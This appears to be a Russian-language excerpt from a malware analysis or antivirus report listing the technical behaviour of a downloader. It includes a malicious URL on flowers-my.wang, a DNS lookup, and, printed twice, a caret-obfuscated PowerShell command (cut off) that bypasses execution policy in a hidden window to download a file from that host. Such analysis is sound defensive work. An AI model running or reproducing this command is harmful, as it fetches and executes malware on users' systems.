Техническая информация
- http://flowers-my.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^o^we^rS^HEll^.Exe^ -eX^ecut^ion^pOL^ic^Y B^yp^AS^S -NoprO^f^ILe^ -WiN^dOws^TYl^E ^H^idD^EN^ (^Ne^w-OBJ^e^CT sy^s^tEm.nE^T.^W^E^BcL^i^EnT).d^o^w^n^L^OA^DfiLE('http://flowers-...
- DNS ASK fl###rs-my.wang
- '<SYSTEM32>\cmd.exe' /C "p^o^we^rS^HEll^.Exe^ -eX^ecut^ion^pOL^ic^Y B^yp^AS^S -NoprO^f^ILe^ -WiN^dOws^TYl^E ^H^idD^EN^ (^Ne^w-OBJ^e^CT sy^s^tEm.nE^T.^W^E^BcL^i^EnT).d^o^w^n^L^OA^DfiLE('http://flowers-...' (со скрытым окном)